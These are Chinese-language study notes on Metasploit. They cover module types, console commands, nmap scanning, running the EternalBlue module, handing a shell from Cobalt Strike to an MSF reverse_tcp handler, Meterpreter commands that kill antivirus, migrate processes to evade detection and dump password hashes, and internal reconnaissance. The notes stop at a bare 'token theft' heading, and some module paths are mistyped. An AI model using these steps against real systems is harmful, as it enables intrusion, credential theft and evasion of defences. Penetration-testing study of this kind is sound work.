MSF使用练习
安装Google中文输入法 apt-get install fcitx apt-get install fcitx-googlepinyin
msf简介
Metasploit框架(Metasploit Framework,MSF) 默认安装目录 /usr/share/metasploit-framework/ 命令行下输入msfconsole
主要模块 Auxiliary(辅助模块) Exploits(漏洞利用模块)
Payloads(攻击载荷模块) Post(后期渗透模块) Encoders(编码工具模块)
基本命令
?/help 查看帮助信息 ?命令名 查看该命令如何使用 search 查找 use 使用某一工具 back 返回 exit 退出MSF
info模块名 显示一个或多个模块的信息 show options显示所有选项 set 给一个选项赋值 setg 将一个选项赋值到全局变量 unset 取消选项赋值 unsetg 取消一个全局选项的赋值 version 显示MSF和控制台版本
portscan端口扫描模块
设置好参数就运行就可以(nmap也要用熟),使用端口扫描模块时可以扫两次,看看结果是否相同
nmap -sV -O ip地址
msf攻击步骤
攻击步骤 1.扫描目标机系统,寻找可用漏洞 ⒉选择并配置一个漏洞利用模块 3.选择并配置一个攻击载荷模块 4.选择一个编码技术,用来绕过杀毒软件的查杀 5.渗透攻击
discovery/arp模块
用于发现网段内的主机
永恒之蓝
搜索17-010即可找到永恒之蓝攻击模块,设置好参数后直接运行就可以进行攻击
cs给msf传shell
创建监听,还用reverse http即可。然后获取一个shell。 再创建一个外部监听,演示外部监听tcp类型,地址写MSF地址,端口写未被占用的端口。 MSF下use exploit/multi/handler set payload windows/meterpreter/reverse tcp,端口设置成和刚才CS设置的相同端口,IP设置为MSF的IP运行监听模块 在已取得的shell上右键,选择spawn,选择刚创建的外部监听。 切回MSF,发现MSF已经接收到shell。
Meterpreter
Meterpreter中常用的反弹类型 rexerse tcp 基于TCP的反向链接反弹shell,使用起来很稳定,需要设置LHOST reverse_http 基于http方式的反向连接,在网速慢的情况下不稳定。 reverse_https 基于https方式的反向连接,在网速慢的情况下不稳定,https如果反弹没有收到数据,可以将监听端口换成443试试 bind tcp 基于TCP的正向连接shell,不需要设置LHOST
常用命令:sysinfo、ls、run post/windows/gather/checkvm、idletime、getuid、run post/windows/manage/killav(关闭系统杀毒软件)
进程迁移
后渗透攻击第一步需要移动这个shell,把他和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何读写操作。这样做是的渗透更难被检测到。 1.输入ps获取目标机正在运行的进程。 2.输入getpid查看Meterpreter Shell的进程号。 3.输入migrate +要移动到的进程号迁移进程。 4.再次输入getpid查看进程号,确认迁移成功。 5.自动迁移进程命令:run postwindows/manage/migrate ,系统会自动寻找合适的进程然后迁移。
msfvenom模块
https://www.cnblogs.com/bmjoker/p/10051014.html
这个网站有不同系统的木马的命令
msf获取hash
run post/windowslgatherlsmart hashdump
内网信息收集
判断是否为虚拟机使用频率比较高 post/windows/gather/checkvm 开启哪些服务 post/windowslgatherlenum_services 安装了哪些应用post/windows/gatherlenum applications
令牌窃取
